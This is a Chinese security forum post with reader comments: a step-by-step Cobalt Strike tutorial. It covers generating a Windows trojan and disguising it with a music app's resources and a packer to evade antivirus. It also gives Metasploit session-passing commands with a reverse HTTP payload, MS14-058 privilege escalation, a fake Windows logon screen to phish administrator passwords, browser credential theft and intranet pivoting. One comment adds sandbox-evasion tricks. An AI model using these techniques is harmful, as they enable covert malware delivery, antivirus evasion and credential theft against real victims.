浅谈cs免杀和使用(粗略完成)

TanSon   ·   发表于 2020-12-08 00:06:35   ·   技术文章

Cobaltstrike简介

作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选,fireeye多次分析过实用cobaltstrike进行apt的案例。

Cobaltstrike安装

cs需要一个服务器来进行,我们把它放到服务器上。然后运行./teaserver ip 密码即可。


然后使用cs客户端连接即可,输入对应ip、端口和密码。

Cobaltstrike生成木马

首先创建监听器


攻击-》生成后门-》windows executable,选择监听点击保存即可生成木马


不过cs生成木马已经被杀软加入病毒库,很容易别查杀,所以我们需进行一些免杀操作。


常见免杀方式

  1. 修改特征码
  2. 花指令免杀
  3. 加壳免杀
  4. 内存免杀
  5. 二次编译
  6. 分离免杀
  7. 资源修改

正文(资源修改+加壳组合免杀)

这里使用前辈的免杀木马脚本,虽然已经被加入病毒库了,但是通过常见免杀还是可以bypass杀软。


首先打开应用Restorator,拖进木马和网易云,把网易云所有资源信息都复制到木马上,点击保存即可。


不过这样子修改的话,还是不太行,还是被火绒查杀了

那么我们对这个木马,进行加壳,检测选项基本都勾上,点击“保护”即可生成。


我们再打开杀软查杀,发现组合免杀生效了,绕过了火绒和360


尝试运行看看是否会被查杀,可以看到没有拦截,成功上线了。


Cobalt strike 向 Msf传递会话:

当我们获得一个cs木马会话时,那么该怎么传递到msf呢?其实也挺简单的,再配置一个监听器,设置模块为Foreign HTTP

配置好后在上线的主机上右击Spawn(增加会话),选择Foreign HTTP监听模块,这时候msf监听那边就会接收到会话

Msf派生shell给Cobaltstrike:

这里还是新建一个监听器,设置模块为beacon HTTP

接下来把kali上获得的meterpreter会话转发到cobaltstrike主机上,这里我们需要用到一个exploit模块

1.  exploit/windows/local/payload_inject

2.  set payload windows/meterpreter/reverse_http

3.  set DisablePayloadHandler true

4.  set lhost 192.168.43.147

5.  set lport  8081

6. set  session 4

7.  run


这时候返回客户端可以发现已经返回一个名为cs的会话


Cobaltstrike提权

当我们拿到会话时,首先应该输入sleep 1来修改响应时间,因为cs默认执行命令响应为60/s,这样子太慢了。影响实验效率


接下来要怎么提权呢?我们回到beacon shell输入elevate查看可用的提权脚本,发现只有两个。


为了丰富我们的提权脚本,我们可以自己导入一个多提权脚本。导入很简单:cobalt strike-》脚本-》laod->选择要导入cna即可。

导入成功后,我们使用各个导入的脚本尝试提权:右键会话-》梼杌-》权限维持-》ms14-058,这时候可以看到返回一个system的会话,说明提权成功。



Cobaltstrike伪造Windows登录界面

有时候获取到会话时,因为目标系统版本过高,无法直接使用猕猴桃读取密码,还得去修改注册表,这就很麻烦。这时候我们就可以用c语言写一个钓鱼的系统登录页面来窃取密码,在beacon输入命令execute-assembly FakeLogonScreen.exe即可

此时目标服务器弹出了登录页面,目标管理员一看到应该也没有什么怀疑,直接就输入密码。这时候我们的cs客户端可以看到管理员输入的内容了。

获取浏览器储存的密码

很多人为了操作方便,习惯性的将密码储存在浏览器中。这使得攻击者可以利用人懒得特性,来进行获取存储在浏览器里的密码。

扫描内网网站

当我们拿下内网后,就可以扫描存在内网中的网站,因为很多测试网站都处于内网中且安全性低。这样就可以攻击内网网站了。

Cobaltstrike代理

会话右键-》中转-》SOCKS Server 开启 socks4 代理,选择想要的端口,打开 proxifier输入我们刚刚选择的端口即可,对内网做更多操作。

用户名金币积分时间理由
奖励系统 50.00 0 2021-06-11 17:05:15 投稿满 5 赞奖励
veek 80.00 0 2020-12-08 10:10:23 期待完善~

打赏我,让我更有动力~

52 条回复   |  直到 2022-7-12 | 7759 次浏览

果冻
发表于 2020-12-8

666

评论列表

  • 加载数据中...

编写评论内容

holic
发表于 2020-12-8

分享你一下吧,可以判断进程数绕过启发式查杀,生成c的shellcode,然后去编写,我就是这样,得劲好用,至于每个杀软的沙箱的进程数判断就自己探测吧,也可以判断温度,因为沙箱是没有真实环境真实的,比如我们正常用户保底100个进程以上,但是杀软可能就几个或者十几个

评论列表

  • 加载数据中...

编写评论内容

htj
发表于 2020-12-11

看看

评论列表

  • 加载数据中...

编写评论内容

和谐文明
发表于 2020-12-14

q

评论列表

  • 加载数据中...

编写评论内容

向量
发表于 2020-12-14

nice

评论列表

  • 加载数据中...

编写评论内容

fan_c
发表于 2020-12-16

可以可以

评论列表

  • 加载数据中...

编写评论内容

hacksky
发表于 2020-12-18

看看

评论列表

  • 加载数据中...

编写评论内容

tgs
发表于 2020-12-20

学习学习

评论列表

  • 加载数据中...

编写评论内容

千城墨白
发表于 2020-12-20

5445454545

评论列表

  • 加载数据中...

编写评论内容

yangroupaomo
发表于 2020-12-22

隐藏了什么

评论列表

  • 加载数据中...

编写评论内容

spiao
发表于 2020-12-23

666

评论列表

  • 加载数据中...

编写评论内容

溪风
发表于 2020-12-23

66

评论列表

  • 加载数据中...

编写评论内容

xiaoc
发表于 2021-1-24

是不是还少了利用CS进行信息收集钓鱼页面展示,批量邮件发送,C2配置文件修改等等。
另外那个脚本管理处,也是一笔带过是不是有点简洁,beacon控制台与图形化界面得关系是不是可以简单讲讲。
生成得木马种类是不是也可以简单说说。等你慢慢补充完毕这些内容,你的理解会更上一层楼,期待完善。

评论列表

  • 加载数据中...

编写评论内容

yeshengjie
发表于 2021-1-24

666

评论列表

  • 加载数据中...

编写评论内容

miosky
发表于 2021-1-24

66666

评论列表

  • 加载数据中...

编写评论内容

柠檬
发表于 2021-1-25

666

评论列表

  • 加载数据中...

编写评论内容

黑影
发表于 2021-1-25

66

评论列表

  • 加载数据中...

编写评论内容

ceg
发表于 2021-1-27

666

评论列表

  • 加载数据中...

编写评论内容

ajming
发表于 2021-1-27

6666

评论列表

  • 加载数据中...

编写评论内容

webdogc
发表于 2021-1-27

6

评论列表

  • 加载数据中...

编写评论内容
1 2 3 / 3 跳转 尾页
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.